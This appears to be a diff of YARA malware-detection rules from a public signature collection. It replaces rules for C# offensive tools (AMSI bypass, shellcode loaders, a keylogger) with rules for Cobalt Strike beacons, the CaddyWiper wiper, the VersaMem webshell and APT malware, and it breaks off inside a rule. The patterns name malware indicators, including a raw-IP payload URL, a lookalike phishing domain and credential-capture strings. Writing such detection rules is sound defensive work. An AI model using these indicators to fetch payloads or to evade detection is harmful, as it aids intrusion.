-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L572-L588"
+		description = "Detects CobaltStrike beacons"
+		author = "JPCERT"
+		id = "8508c7a0-0131-59b1-b537-a6d1c6cb2b35"
+		date = "2018-11-09"
+		modified = "2023-12-05"
+		reference = "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L40-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "07ba9b4c303c12a74a13b28dddd4b1118cc30335bf9e76d8146224242619e87d"
+		logic_hash = "0f429a7a8c8bbea22eba3bbf81e391dab8e957583283a995d1d60d42f17c20e7"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii wide
-		$typelibguid0up = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii wide
-		$typelibguid1lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
-		$typelibguid1up = "B2B3ADB0-1669-4B94-86CB-6DD682DDBEA3" ascii wide
+		$v1 = { 73 70 72 6E 67 00 }
+		$v2 = { 69 69 69 69 69 69 69 69 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Azurecli_Extractor : FILE
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_Strings
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f595545a-a7a6-577c-b3f4-febf7bf1b6c3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/0x09AL/AzureCLI-Extractor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L590-L604"
+		description = "Identifies strings used in Cobalt Strike Beacon DLL"
+		author = "Elastic"
+		id = "af558aa2-a3dc-5a7a-bc74-42bb2246091c"
+		date = "2021-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L54-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5ea4dd540a39ac1160da15434b19036a99da69ea999ca0b0f5193fe32a263dca"
+		logic_hash = "4349a7ad94df2269217b55c2aef9628c4eef078566c276936accdd4f996ba2cf"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii wide
-		$typelibguid0up = "A73CAD74-F8D6-43E6-9A4C-B87832CDEACE" ascii wide
+		$s1 = "%02d/%02d/%02d %02d:%02d:%02d"
+		$s2 = "Started service %s on %s"
+		$s3 = "%s as %s\\%s: %d"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Escaper : FILE
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_XOR_Strings
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ea95ff3c-0cbb-5230-b5e4-bd8b2ff975eb"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/UAC-Escaper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L606-L620"
+		description = "Identifies XOR'd strings used in Cobalt Strike Beacon DLL"
+		author = "Elastic"
+		id = "359160a8-cf1c-58a8-bf7f-c09a8d661308"
+		date = "2021-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L69-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6e293a6c1589b527ac4d72ccc5609b6899a8ff69009d30e9a93b046484564c8"
+		logic_hash = "b5009c29055784ce6371100417b862f723d7e3c1b4081c563fcd8770db48051f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		xor_s1 = "%02d/%02d/%02d %02d:%02d:%02d"
+		xor_s2 = "Started service %s on %s"
+		xor_s3 = "%s as %s\\%s: %d"
 
 	strings:
-		$typelibguid0lo = "95359279-5cfa-46f6-b400-e80542a7336a" ascii wide
-		$typelibguid0up = "95359279-5CFA-46F6-B400-E80542A7336A" ascii wide
+		$s1 = "%02d/%02d/%02d %02d:%02d:%02d" xor(0x01-0xff)
+		$s2 = "Started service %s on %s" xor(0x01-0xff)
+		$s3 = "%s as %s\\%s: %d" xor(0x01-0xff)
+		$fp1 = "MalwareRemovalTool"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Httpsbeaconshell : FILE
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_Decrypt
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d66e3566-6082-570a-a168-f44c9d8c7619"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L622-L636"
+		description = "Identifies deobfuscation routine used in Cobalt Strike Beacon DLL version 4.2"
+		author = "Elastic"
+		id = "63b71eef-0af5-5765-b957-ccdc9dde053b"
+		date = "2021-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L90-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0c40d1ab0bfc34a0f27e7e3f84522a93c0d635cba929a708fbd38dfce4404fb"
+		logic_hash = "8685b1626c8d263f49ccf129dcd4fe1b42482fcdb37c2e109cedcecaed8c2407"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii wide
-		$typelibguid0up = "ACA853DC-9E74-4175-8170-E85372D5F2A9" ascii wide
+		$a_x64 = {4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03}
+		$a_x86 = {8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Amsiscanbufferbypass : FILE
+rule SIGNATURE_BASE_HKTL_Win_Cobaltstrike : COMMODITY
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "12a15e61-30fb-50a3-a59b-39f9871444f0"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L638-L652"
+		description = "The CobaltStrike malware family."
+		author = "threatintel@volexity.com"
+		id = "113ba304-261f-5c59-bc56-57515c239b6d"
+		date = "2021-05-25"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike.yar#L104-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a064209a06c13506b2d2f3754aed30199b0f4f1c0ef4bc465d847a21b0917545"
+		hash = "b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c"
+		logic_hash = "1e8a68050ff25f77e903af2e0a85579be1af77c64684e42e8f357eee4ae59377"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "COMMODITY"
 
 	strings:
-		$typelibguid0lo = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii wide
-		$typelibguid0up = "431EF2D9-5CCA-41D3-87BA-C7F5E4582DD2" ascii wide
+		$s1 = "%s (admin)" fullword
+		$s2 = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A 0D 0A 00}
+		$s3 = "%02d/%02d/%02d %02d:%02d:%02d" fullword
+		$s4 = "%s as %s\\%s: %d" fullword
+		$s5 = "%s&%s=%s" fullword
+		$s6 = "rijndael" fullword
+		$s7 = "(null)"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcodeloader : FILE
+rule SIGNATURE_BASE_MAL_WIPER_Caddywiper_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b8787dac-48a3-5711-86ba-0fda86b6224e"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Hzllaga/ShellcodeLoader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L654-L668"
+		description = "Detects CaddyWiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "83495a0d-a295-5ec7-9761-ce79918e1034"
+		date = "2022-03-15"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ESETresearch/status/1503436420886712321?s=20&t=xh8JK6fEmRIrnqO7Ih_PNg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_caddywiper.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8a36476d087b82e96ea60de1a9879b261d533fb148c44a2e6544fdaa7c574e6"
-		score = 75
+		logic_hash = "0d0278596010953e7068979c92a33dc0ace1bfa94979077412128d1ca756f834"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1e87e9b5ee7597bdce796490f3ee09211df48ba1d11f6e2f5b255f05cc0ba176"
+		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
+		hash3 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
+		hash4 = "f1e8844dbfc812d39f369e7670545a29efef6764d673038b1c3edd11561d6902"
 
 	strings:
-		$typelibguid0lo = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii wide
-		$typelibguid0up = "A48FE0E1-30DE-46A6-985A-3F2DE3C8AC96" ascii wide
+		$op1 = { ff 55 94 8b 45 fc 50 ff 55 f8 8a 4d ba 88 4d ba 8a 55 ba 80 ea 01 }
+		$op2 = { 89 45 f4 83 7d f4 00 74 04 eb 47 eb 45 6a 00 8d 95 1c ff ff ff 52 }
+		$op3 = { 6a 20 6a 02 8d 4d b0 51 ff 95 68 ff ff ff 85 c0 75 0a e9 4e 02 00 00 }
+		$op4 = { e9 67 01 00 00 83 7d f4 05 74 0a e9 5c 01 00 00 e9 57 01 00 00 8d 45 98 50 6a 20 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them or all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Keystrokeapi : FILE
+rule SIGNATURE_BASE_No_Powershell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e715bce8-531b-5e2a-bd02-b2fc4990c499"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/fabriciorissetto/KeystrokeAPI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L670-L686"
+		description = "Detects an C# executable used to circumvent PowerShell detection - file nps.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "362a61bc-2c10-5076-93be-9f8b5a9ae8ba"
+		date = "2016-05-21"
+		modified = "2023-12-05"
+		reference = "https://github.com/Ben0xA/nps"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nopowershell.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e638c173817ce6e1b59bfd897ba3d45e24a5c1020014999e2ad21afcd4f21291"
-		score = 75
+		logic_hash = "9fba467cfbf8cad0c8e6cf1e1c7eacd8b0be869ebe6c5180f50f5cdefa8b5bb5"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "64f811b99eb4ae038c88c67ee0dc9b150445e68a2eb35ff1a0296533ae2edd71"
 
 	strings:
-		$typelibguid0lo = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii wide
-		$typelibguid0up = "F6FEC17E-E22D-4149-A8A8-9F64C3C905D3" ascii wide
-		$typelibguid1lo = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii wide
-		$typelibguid1up = "B7AA4E23-39A4-49D5-859A-083C789BFEA2" ascii wide
+		$s1 = "nps.exe -encodedcommand {base64_encoded_command}" fullword wide
+		$s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcoderunner : FILE
+rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "949364e7-dcb6-5afd-ade9-cc34a6e15e97"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/antman1p/ShellCodeRunner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L688-L704"
+		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
+		author = "blacklotuslabs (modified by Florian Roth and X__Junior)"
+		id = "9b666e61-cfa8-58b3-a362-772cd907c57c"
+		date = "2024-08-27"
+		modified = "2024-08-29"
+		reference = "https://x.com/ryanaraine/status/1828440883315999117"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volttyphoon_versamem.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "48dfe2ea9b3ff1ae22c5436b8cb3f3f48658032c94463e2babeb6894ce3c666f"
+		logic_hash = "d21558eb6c8e700b8a4cb86fdaa5487179828152af68828e878397859d6d3952"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii wide
-		$typelibguid0up = "634874B7-BF85-400C-82F0-7F3B4659549A" ascii wide
-		$typelibguid1lo = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii wide
-		$typelibguid1up = "2F9C3053-077F-45F2-B207-87C3C7B8F054" ascii wide
+		$sa1 = "com.versa.vnms.ui.TestMain"
+		$sa2 = "captureLoginPasswordCode"
+		$sa3 = "com/versa/vnms/ui/services/impl/VersaAuthenticationServiceImpl"
+		$sa4 = "/tmp/.temp.data"
+		$sa5 = "getInsertCode"
+		$sa6 = "VersaMem"
+		$sa7 = "Versa-Auth"
+		$sb1 = "/tmp/.java_pid"
+		$sb2 = {2f 75 73 72 2f 62 69 6e 2f 70 67 72 65 70 01 00 02 2d 66 01 00 25 6f 72 67 2e 61 70 61 63 68 65 2e 63 61 74 61 6c 69 6e 61 2e 73 74 61 72 74 75 70 2e 42 6f 6f 74 73 74 72 61 70 07}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 5MB and ( 3 of them or all of ( $sb* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivecsharp : FILE
+rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "339f6858-6076-5320-ba5f-2903e642ea42"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/diljith369/OffensiveCSharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L706-L742"
+		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
+		author = "Florian Roth"
+		id = "5ca598ed-5d0a-563d-a5e8-f8229af2c949"
+		date = "2024-08-29"
+		modified = "2024-12-12"
+		reference = "https://x.com/craiu/status/1828687700884336990"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volttyphoon_versamem.yar#L27-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8b3f8652b88b353d4fc162f93b373d5beeaaca1b1ebbeaef07a46d859aef4c12"
+		logic_hash = "0bdf3bf5130c51c1355f179704933ca473a702595c580642035c8d3b9aad5725"
 		score = 75
-		quality = 83
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4bcedac20a75e8f8833f4725adfc87577c32990c3783bf6c743f14599a176c37"
 
 	strings:
-		$typelibguid0lo = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii wide
-		$typelibguid0up = "6C3FBC65-B673-40F0-B1AC-20636DF01A85" ascii wide
-		$typelibguid1lo = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii wide
-		$typelibguid1up = "2BAD9D69-ADA9-4F1E-B838-9567E1503E93" ascii wide
-		$typelibguid2lo = "512015de-a70f-4887-8eae-e500fd2898ab" ascii wide
-		$typelibguid2up = "512015DE-A70F-4887-8EAE-E500FD2898AB" ascii wide
-		$typelibguid3lo = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii wide
-		$typelibguid3up = "1EE4188C-24AC-4478-B892-36B1029A13B3" ascii wide
-		$typelibguid4lo = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii wide
-		$typelibguid4up = "5C6B7361-F9AB-41DC-BFA0-ED5D4B0032A8" ascii wide
-		$typelibguid5lo = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii wide
-		$typelibguid5up = "048A6559-D4D3-4AD8-AF0F-B7F72B212E90" ascii wide
-		$typelibguid6lo = "3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii wide
-		$typelibguid6up = "3412FBE9-19D3-41D8-9AD2-6461FCB394DC" ascii wide
-		$typelibguid7lo = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii wide
-		$typelibguid7up = "9EA4E0DC-9723-4D93-85BB-A4FCAB0AD210" ascii wide
-		$typelibguid8lo = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii wide
-		$typelibguid8up = "6D2B239C-BA1E-43EC-8334-D67D52B77181" ascii wide
-		$typelibguid9lo = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii wide
-		$typelibguid9up = "42E8B9E1-0CF4-46AE-B573-9D0563E41238" ascii wide
-		$typelibguid10lo = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii wide
-		$typelibguid10up = "0D15E0E3-BCFD-4A85-ADCD-0E751DAB4DD6" ascii wide
-		$typelibguid11lo = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii wide
-		$typelibguid11up = "644DFD1A-FDA5-4948-83C2-8D3B5EDA143A" ascii wide
+		$x1 = "tomcat_memShell" ascii
+		$x2 = "versa/vnms/ui/config/" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x4b50 and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_SHAPESHIFTER : FILE
+rule SIGNATURE_BASE_APT_NK_Methodology_Artificial_Useragent_IE_Win7 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8903c65a-624f-5e8d-a3f6-4572b56bd2f7"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/matterpreter/SHAPESHIFTER"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L744-L758"
+		description = "Detects hard-coded User-Agent string that has been present in several APT37 malware families."
+		author = "Steve Miller aka @stvemillertime"
+		id = "a747c908-7af7-5c29-8386-a71db7648061"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt37.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9c53ead8bc93f874b9fab11be0e281fa11f2c590a4c9e649d67eed84de79783d"
-		score = 75
+		logic_hash = "43119b83a7eaf3dade9477d342b5656970940e9b4f41b3ba5f720d7fbe927762"
+		score = 45
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e63efbf8624a531bb435b7446dbbfc25"
 
 	strings:
-		$typelibguid0lo = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii wide
-		$typelibguid0up = "A3DDFCAA-66E7-44FD-AD48-9D80D1651228" ascii wide
+		$a1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
+		$a2 = {4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 20 57 4f 57 36 34 3b 20 54 72 69 64 65 6e 74 2f 37 2e 30 3b 20 72 76 3a 31 31 2e 30 29 20 6c 69 6b 65 20 47 65 63 6b 6f 00 00 00 00}
+		$fp1 = "Esumsoft" wide
+		$fp2 = "Acunetix" wide ascii
+		$fp3 = "TASER SYNC" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and all of ( $a* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Evasor : FILE
+rule SIGNATURE_BASE_Scanbox_Malware_Generic
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "457959ed-3e90-52c7-89f9-e1b17b35260e"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/cyberark/Evasor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L760-L774"
+		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f7867e65-567f-530f-83d4-b5126021e523"
+		date = "2015-02-28"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/WXUQcP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_scanbox_deeppanda.yar#L2-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69bda55c5a1c8f432c582066eab5efb2aa443fbf0a73e7c4d16d7e987cf1db2e"
+		logic_hash = "5f521d3f000fb39e5e3b08657e75219e93fb3bb8ffbbdbd70f471928a56bef27"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
+		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
+		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
 
 	strings:
-		$typelibguid0lo = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii wide
-		$typelibguid0up = "1C8849EF-AD09-4727-BF81-1F777BD1AEF8" ascii wide
+		$s0 = "http://142.91.76.134/p.dat" fullword ascii
+		$s1 = "HttpDump 1.1" fullword ascii
+		$s3 = "SecureInput .exe" fullword wide
+		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
+		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
+		$s6 = "ServiceMaix" fullword ascii
+		$x1 = "Management Support Team1" fullword ascii
+		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
+		$x3 = "SEOUL1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(1 of ( $s* ) and 2 of ( $x* ) ) or ( 3 of ( $x* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stracciatella : FILE
+rule SIGNATURE_BASE_Groups_Cpassword : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5b1a8102-6d59-5f2f-8ae2-b3c1f75a561d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/mgeeky/Stracciatella"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L776-L790"
+		description = "Groups XML contains cpassword value, which is decrypted password - key is in MSDN http://goo.gl/mHrC8P"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37036df9-871f-5ecd-acac-6a064d298115"
+		date = "2015-09-08"
+		modified = "2023-12-05"
+		reference = "http://www.grouppolicy.biz/2013/11/why-passwords-in-group-policy-preference-are-very-bad/"
